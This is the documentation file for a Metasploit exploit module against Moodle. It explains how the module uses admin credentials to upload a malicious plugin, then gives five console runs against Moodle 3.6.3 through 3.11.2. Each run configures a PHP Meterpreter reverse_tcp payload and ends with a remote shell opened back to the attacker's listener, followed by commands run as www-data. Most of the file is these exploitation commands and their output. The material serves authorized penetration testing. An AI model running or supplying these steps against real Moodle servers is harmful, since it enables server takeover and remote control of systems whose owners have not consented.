metasploit-gs/documentation/modules/exploit/multi/http/moodle_admin_shell_upload.md

Vulnerable Application

This module will generate a plugin which can receive a malicious payload request and upload it to a server running Moodle provided valid admin credentials are used. Then the payload is sent for execution, and the plugin uninstalled.

You must have an admin account to exploit this vulnerability.

Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2

Verification Steps

1. Install moodle
2. Start msfconsole
3. Do: use exploits/multi/http/moodle_admin_shell_upload
4. Do: set username [username]
5. Do: set password [password]
6. Do: run
7. You should get a shell.

Options

Username

Username for an admin user. Default is admin

Password

Password for an admin user

Scenarios

Moodle 3.8.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/
targeturi => /moodle-3.8.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: tqmdaefi
[*] Uploading plugin
[+] Plugin tqmdaefi.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56156) at 2021-08-29 16:03:40 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.6.3 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/
targeturi => /moodle-3.6.3/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ttvszmjy
[*] Uploading plugin
[+] Plugin ttvszmjy.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56158) at 2021-08-29 16:09:49 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.9.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: jwnsnjof
[*] Uploading plugin
[+] Plugin jwnsnjof.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56182) at 2021-08-29 16:47:00 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.10.0 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: xstassyj
[*] Uploading plugin
[+] Plugin xstassyj.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56186) at 2021-08-29 16:49:52 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.11.2 on Ubuntu 20.04

resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ksrhyfeq
[*] Uploading plugin
[+] Plugin ksrhyfeq.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56190) at 2021-08-29 16:54:03 -0400
[*] Uninstalling plugin

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux